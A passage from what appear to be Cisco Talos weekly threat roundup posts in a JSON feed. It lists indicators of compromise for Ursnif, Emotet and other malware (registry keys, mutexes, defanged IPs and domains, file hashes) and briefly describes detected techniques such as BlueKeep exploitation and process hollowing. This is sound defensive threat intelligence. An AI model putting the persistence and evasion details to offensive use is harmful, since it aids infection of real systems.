AMP\n\n[](<https://1.bp.blogspot.com/-YPfV0hk_MzU/XURFNSjfRDI/AAAAAAAAB6c/2UXhrXnk0qUR6WrA2JQTe7LwFcIrdrvLACLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-DiQTlcddsb0/XURFRKbXKyI/AAAAAAAAB6g/pAfsNoLc-uYEOtD4ObZVzl2esVlXmrimQCLcBGAs/s1600/fc08509806bfbd4142b38782f2b397604e8c9cbde369c5384531b384635a57a1_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-66XwOVuceSY/XURFV5jXtMI/AAAAAAAAB6o/NhsSyNsPDPoPkybh2CdBVDFgRd4Q927hwCLcBGAs/s1600/1bc0cc8e902068bced4d8a5a3995996e4004aaf4f7f7d472a137ead9d9531f6a_umbrella.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Ursnif-7083691-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 27 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 27 \n`<HKCU>\\Software\\AppDataLow\\Software\\Microsoft\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: apiMPQEC ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client32 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client64 ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: datat3hc ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Dmlogpui ` | 9 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 2 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 2 \nMutexes | Occurrences \n---|--- \n`killsoldierS` | 28 \n`songSixLe` | 28 \n`Local\\https://www.avast.com/` | 27 \n`Local\\https://vars.hotjar.com/` | 26 \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 5 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 5 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 5 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 5 \n`Global\\6ed2e341-b08b-11e9-a007-00501e3ae7b5` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]12[.]206` | 27 \n`157[.]240[.]18[.]19` | 27 \n`172[.]217[.]12[.]198` | 27 \n`172[.]217[.]10[.]104` | 27 \n`169[.]54[.]251[.]164` | 27 \n`152[.]199[.]4[.]33` | 27 \n`23[.]221[.]50[.]102` | 27 \n`13[.]109[.]156[.]118` | 27 \n`172[.]217[.]10[.]4` | 26 \n`157[.]240[.]18[.]35` | 26 \n`23[.]41[.]182[.]96` | 24 \n`172[.]217[.]3[.]110` | 23 \n`104[.]107[.]26[.]214` | 22 \n`204[.]79[.]197[.]200` | 21 \n`65[.]55[.]44[.]109` | 21 \n`104[.]107[.]18[.]91` | 21 \n`23[.]41[.]181[.]230` | 20 \n`38[.]126[.]130[.]202` | 20 \n`13[.]107[.]21[.]200` | 18 \n`204[.]11[.]109[.]66` | 17 \n`23[.]221[.]50[.]122` | 16 \n`23[.]221[.]49[.]75` | 16 \n`204[.]2[.]197[.]202` | 16 \n`173[.]194[.]175[.]157` | 15 \n`23[.]54[.]215[.]147` | 15 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`googleads[.]g[.]doubleclick[.]net` | 27 \n`www[.]googletagmanager[.]com` | 27 \n`www[.]google-analytics[.]com` | 27 \n`connect[.]facebook[.]net` | 27 \n`www[.]googleadservices[.]com` | 27 \n`avast[.]com` | 27 \n`static[.]avast[.]com` | 27 \n`mc[.]yandex[.]ru` | 27 \n`dev[.]visualwebsiteoptimizer[.]com` | 27 \n`amplifypixel[.]outbrain[.]com` | 27 \n`pixel[.]mathtag[.]com` | 27 \n`tr[.]outbrain[.]com` | 27 \n`amplify[.]outbrain[.]com` | 27 \n`ajax[.]aspnetcdn[.]com` | 27 \n`img-prod-cms-rt-microsoft-com[.]akamaized[.]net` | 27 \n`az725175[.]vo[.]msecnd[.]net` | 27 \n`script[.]hotjar[.]com` | 27 \n`static[.]hotjar[.]com` | 27 \n`c[.]s-microsoft[.]com` | 27 \n`assets[.]onestore[.]ms` | 27 \n`www[.]avast[.]com` | 27 \n`vars[.]hotjar[.]com` | 27 \n`static3[.]avast[.]com` | 27 \n`action[.]media6degrees[.]com` | 27 \n`6679503[.]fls[.]doubleclick[.]net` | 27 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Mozilla\\Firefox\\Profiles\\1lcuq8ab.default\\prefs.js` | 5 \n`%TEMP%\\RES<random, matching [A-F0-9]{4}>.tmp` | 5 \n`%TEMP%\\seuyoffm.dll` | 1 \n`%TEMP%\\seuyoffm.out` | 1 \n`%TEMP%\\2orfeuv0.dll` | 1 \n`%TEMP%\\2orfeuv0.out` | 1 \n`%TEMP%\\xgn0se5v.dll` | 1 \n`%TEMP%\\xgn0se5v.out` | 1 \n`%TEMP%\\6624.bi1` | 1 \n`%TEMP%\\omznovgy.dll` | 1 \n`%TEMP%\\omznovgy.out` | 1 \n`%TEMP%\\CSC144932DD66624AD4A66FAEED56434A36.TMP` | 1 \n`%TEMP%\\CSCDA1AB6EFEFE44DDB43A48EBFF8742A.TMP` | 1 \n`%TEMP%\\uqovbfke.dll` | 1 \n`%TEMP%\\uqovbfke.out` | 1 \n`%TEMP%\\CSC16F899F61E954B869696D94AD85DEDF4.TMP` | 1 \n`%TEMP%\\0m1c0rej.dll` | 1 \n`%TEMP%\\0m1c0rej.out` | 1 \n`%TEMP%\\0m1c0rej.0.cs` | 1 \n`%TEMP%\\0m1c0rej.cmdline` | 1 \n`%TEMP%\\uqovbfke.0.cs` | 1 \n`%TEMP%\\uqovbfke.cmdline` | 1 \n`%TEMP%\\RESE10.tmp` | 1 \n`%TEMP%\\CSCBAA72AD8A34F43D688C3F6093AC2A3B.TMP` | 1 \n`%TEMP%\\hcfrzhfk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 09de71ba2e0a093748878986b5a845a6a826009638f11dbc0cac7450d55943bd 184abb514e009fbeedeb23d28f3f4d2ba30f2407680dbdda112e5a2761cb904b 1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb 1ec792344097e1ebd114fd49e90e3d0a040a11bb18d3bef5333aebbe12a95a59 1fa590f73f1cce34190ef3975835ad9d48bf03a3718fdb306cd5dae387dc91b9 1ff1c2bd12738bc3ee36651917e52d76bb2c165b6b96594dac4c9179c6ee3c1f 2496306cf77459222d8aad059e22bdde9d963561c7495589e907517b4fdcf495 25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac 28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792 2992047d9fa9e052e63c116a4d66929306ca5e484aae00c5cbf16df8429e9c52 34a36bc17cc76d13e8610b10dddd0855b4c7ec4545a21048843bba1a3b0165ed 3aefeaad4bb74267dfeb3bfacba97f112df7fd4d6bcf0011da48ef723530fcdf 3af45cf6205e4ccec0d57e0dafd09054167b337f4ddd4cb46ed17b16f5247b42 4437c72cd4f0e98ff080328135531b5bd83cd9420731ccb1ec3c410207b931b9 4dd835aa054bc5e17bd4a38454b94fec1565dcea9883b1adfbac691d5a014a3c 4e1e91f011e8a233409ac3cbd4c99d5b8e202296fe11c745fdb37daf48bb9a6e 4f2171077a8413912ed96f60514396708e6aeac2b88124bb9c1fce5858d42597 5147f2ac46cb1f5716b6b84ad6f89480b317e788c05ce2e2dce7c8355f214e5d 5efe419c36aa35ed45f7892304e509093e5d7bcf3eaeea424cc00fb44bf78aae 6c22722f45247e1384fc7b1cce569cdf6e07c38faf56c8aa63880172f2a9d54a 7236e727ba5221e7b863c5748e4837e170ed15cd7f9e6608029b7117a021552a 7a8b10e464c31aa574dd3d8f6d41d4361ebbb5c1e48ff08b3871789287056c75 8cdce07c34684d8613e50bd66df5acbe3f88513417c02049ec25d927ee6dee8f 90263c41cca8e6215b1b1d90c90fbb396b104cb284463e798be50d4c3849cf72 92babffc76f0e8cdd1e58ed39c001943c3b30e2e220abd7f1fcb65e8e4c3829d `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-GhNb_0FGLyY/XURFd7N7vkI/AAAAAAAAB6s/MSkd0hsj6UoaGLKofNVAUAnZFSnnnFBLACLcBGAs/s1600/28a09b1a512cbc0b51850b82a99dfec4597b8fd0a5647d461bb2642fab259792_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-w2jRC7gPlcw/XURFjWj-O7I/AAAAAAAAB60/pBMEXHAZwWQc1X7AbvhC1iP80qdqC5KsQCLcBGAs/s1600/1b4576a2a5ba0f49f1475c2b993201acea056c342bdc0c7eaabd22718e1a52bb_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-7iZ3yvsxN8E/XURFofm55BI/AAAAAAAAB68/XPAhHocFOJAvm9boWIrYgrPvd8gk6Hz3wCLcBGAs/s1600/25062ef38c0e9751e8b619eed7ab76a4fe61d4c178db9c1b9dddd2cf49afbbac_umbrella.png>)\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nMadshi injection detected \\- (1834) \n--- \nMadshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique. \nKovter injection detected \\- (1447) \nA process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns. \nTrickbot malware detected \\- (974) \nTrickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching. \nExcessively long PowerShell command detected \\- (935) \nA PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats. \nCVE-2019-0708 detected \\- (347) \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. \nProcess hollowing detected \\- (266) \nProcess hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead. \nGamarue malware detected \\- (172) \nGamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system. \nDealply adware detected \\- (83) \nDealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware. \nInstallcore adware detected \\- (60) \nInstall core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware. \nPowerShell file-less infection detected \\- (45) \nA PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families. \n \n", "modified": "2019-08-02T08:36:00", "published": "2019-08-02T08:36:00", "id": "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/hNEZe9LGHA4/threat-roundup-0726-0802.html", "type": "talosblog", "title": "Threat Roundup for July 26 to Aug. 2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-25T17:34:07", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 18 and Oct. 25. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5db322f0ac4bd.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nWin.Dropper.Emotet-7355854-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Ursnif-7355802-1 | Malware | Ursnif is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits. \nWin.Malware.Upatre-7355650-0 | Malware | Upatre is a trojan that is often delivered through spam emails with malicious attachments or links. It is known to be a downloader and installer for other malware. \nWin.Dropper.Kovter-7352197-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store it's malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. It has been used in the past to spread ransomware and click-fraud malware. \nWin.Malware.Trickbot-7352185-1 | Malware | Trickbot is a banking trojan targeting sensitive information for select financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB Scripts. \nWin.Virus.Expiro-7350682-0 | Virus | Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks. \nWin.Malware.Tofsee-7349716-1 | Malware | Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator\u2019s control. \nWin.Malware.Nymaim-7348211-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Malware.Cerber-7343756-1 | Malware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although in more recent campaigns, this is no longer the case. \n \n* * *\n\n## Threat Breakdown\n\n### Win.Dropper.Emotet-7355854-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Type ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: Start ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ErrorControl ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ImagePath ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: DisplayName ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: WOW64 ` | 10 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SPOOLERIPSPS \nValue Name: ObjectName ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR\\CLSID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\PROGID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\INPROCHANDLER32 ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\MFCCALC.CALCULATOR\\CLSID ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\LOCALSERVER32 ` | 10 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7} ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7} ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\PROGID ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\INPROCHANDLER32 ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\\LOCALSERVER32 ` | 9 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\PROGID ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\INPROCHANDLER32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\INPROCHANDLER32 ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID ` | 1 \n`<HKLM>\\SOFTWARE\\CLASSES\\WOW6432NODE\\CLSID\\\\LOCALSERVER32 ` | 1 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 10 \n`Global\\M98B68E3C` | 10 \n`Global\\M3C28B0E4` | 8 \n`Global\\I3C28B0E4` | 8 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`45[.]33[.]54[.]74` | 10 \n`54[.]38[.]94[.]197` | 9 \n`173[.]194[.]68[.]108/31` | 8 \n`74[.]208[.]5[.]15` | 7 \n`193[.]70[.]18[.]144` | 7 \n`172[.]217[.]10[.]83` | 7 \n`74[.]208[.]5[.]2` | 6 \n`74[.]6[.]141[.]50/31` | 6 \n`205[.]178[.]146[.]249` | 5 \n`173[.]203[.]187[.]10` | 5 \n`173[.]203[.]187[.]14` | 5 \n`205[.]204[.]101[.]152` | 5 \n`74[.]6[.]141[.]44/31` | 5 \n`17[.]36[.]205[.]74/31` | 5 \n`178[.]128[.]148[.]110` | 5 \n`209[.]141[.]41[.]136` | 5 \n`217[.]69[.]139[.]160` | 4 \n`205[.]178[.]146[.]235` | 4 \n`69[.]147[.]92[.]12` | 4 \n`65[.]55[.]72[.]183` | 4 \n`159[.]127[.]187[.]12` | 4 \n`94[.]100[.]180[.]70` | 4 \n`94[.]100[.]180[.]160` | 4 \n`23[.]227[.]38[.]64` | 4 \n`172[.]217[.]3[.]115` | 4 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`secure[.]emailsrvr[.]com` | 8 \n`smtp-mail[.]outlook[.]com` | 8 \n`smtpout[.]secureserver[.]net` | 8 \n`smtp[.]mail[.]com` | 7 \n`smtp[.]mail[.]ru` | 7 \n`smtp[.]aol[.]com` | 6 \n`smtp[.]comcast[.]net` | 6 \n`smtp[.]1and1[.]com` | 5 \n`smtp[.]prodigy[.]net[.]mx` | 5 \n`ssl0[.]ovh[.]net` | 5 \n`mail[.]paypal[.]com` | 4 \n`mail[.]mail[.]ru` | 4 \n`smtp[.]dsl[.]telkomsa[.]net` | 4 \n`mail[.]widatra[.]com` | 3 \n`smtp[.]dropbox[.]com` | 3 \n`outbound[.]att[.]net` | 3 \n`smtp[.]emailsrvr[.]com` | 3 \n`smtp[.]verizon[.]net` | 3 \n`smtp[.]idmsa[.]apple[.]com` | 3 \n`smtp[.]cox[.]net` | 3 \n`mail[.]enterprisesolutioninc[.]com` | 3 \n`smtp[.]mxhichina[.]com` | 3 \n`mail[.]americashomeplace[.]com` | 3 \n`smtp[.]fatcow[.]com` | 3 \n`relais[.]videotron[.]ca` | 3 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\spooleripspsa.exe` | 1 \n`\\TEMP\\aatgsjewU4YpaJ.exe` | 1 \n`\\TEMP\\4uwvBUGZ.exe` | 1 \n`\\TEMP\\sqjjfdnz8obMXZL.exe` | 1 \n`\\TEMP\\D9VaRGmZ.exe` | 1 \n`%SystemRoot%\\TEMP\\D3F5.tmp` | 1 \n`\\TEMP\\PdapKX6bjx.exe` | 1 \n \n#### File Hashes\n\n` 0bf9f6907fd3f6a3f5734b23120671230c480b03c96a1779348f9cdc49bb58f8 11f97585ad2aeb41f4c972b2e29523d4ca70cc4a065547d9abca659d2c3193d1 418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f 9d8895333339dde00e8778e9181cfbf0df29e35c0dda842aa30ff7a44b96cd11 a3a3de174e94beb142799b6f03c84bfe4c563e287a6a5288bbd64ccc9910ce24 aea84511050a07ff22e621888f19921585485fd171228cc6ad723f4c1b90225f b988217de26056f0db1ba17940d5fc0e138c59fc46652d7b5046281f8152aa0b ca3889a38bf35766b0ad59605bd6d3f6c333309f690708a3b51f7e80cc32be85 d4363da6ccb0a0ef3c69010d7351a2d9459e4c5fef26fe00c240eb901125cd78 ddb191fb3328dd25f79f79133e821cdb36590a80cabb1e6a1206fd11a19445ec `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-FRlFNOpm0Cg/XbMSvyeCfVI/AAAAAAAAC0s/E_8TKFBeqWEznPa8cjb_NdbIdhC5EcjhQCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-stSf5Ksf8ss/XbMSz5eBiCI/AAAAAAAAC0w/NFK7djTRizIWicly3fDTR1I8g2ZfUWVYgCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Ursnif-7355802-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: api-PQEC ` | 10 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\IAM \nValue Name: Server ID ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 10 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 10 \nMutexes | Occurrences \n---|--- \n`Local\\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 10 \n`Local\\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 10 \n`Local\\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 10 \n`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 10 \n`{<random GUID>}` | 10 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`208[.]67[.]222[.]222` | 10 \n`172[.]217[.]10[.]110` | 10 \n`172[.]86[.]121[.]117` | 10 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`resolver1[.]opendns[.]com` | 10 \n`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 10 \n`myip[.]opendns[.]com` | 10 \nFiles and or directories created | Occurrences \n---|--- \n`\\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}` | 10 \n`%APPDATA%\\Microsoft\\Dmlogpui` | 10 \n`%APPDATA%\\Microsoft\\Dmlogpui\\datat3hc.exe` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}>` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{3,4}\\[A-F0-9]{2,4}>.bat` | 10 \n`%TEMP%\\<random, matching [A-F0-9]{4}>.bi1` | 9 \n`\\TEMP\\4F03FE~1.EXE` | 1 \n`%TEMP%\\CE0E\\6707.tmp` | 1 \n`\\TEMP\\69E08A~1.EXE` | 1 \n`%TEMP%\\47D0\\A3E8.tmp` | 1 \n`\\TEMP\\85FD74~1.EXE` | 1 \n`%TEMP%\\903.bi1` | 1 \n`\\TEMP\\906352~1.EXE` | 1 \n`\\TEMP\\A11B56~1.EXE` | 1 \n`%TEMP%\\3634\\1B1A.tmp` | 1 \n`%TEMP%\\3E3E\\1F1F.tmp` | 1 \n`\\TEMP\\BB271B~1.EXE` | 1 \n`\\TEMP\\C1C116~1.EXE` | 1 \n`%TEMP%\\8878\\443C.tmp` | 1 \n`\\TEMP\\CA13C5~1.EXE` | 1 \n`%TEMP%\\C9AC\\64D6.tmp` | 1 \n`\\TEMP\\D66D2E~1.EXE` | 1 \n`\\TEMP\\E4F5F1~1.EXE` | 1 \n \n#### File Hashes\n\n` 4f03fe32e46386a2379e65b631e786cdeeec223017069d2731a723e4d2c50393 69e08aa34638b3b213dc3c7f7a188e4d56685ca8abd4bfa97f575757a1f4bc12 85fd74ee1f19173597c3995376c31c617c0cd615d1d4e862edbe2459200397ed 90635217dd43e1ccfc8c25aef6619b1a929b5e7d1800b9cebd8686d052243611 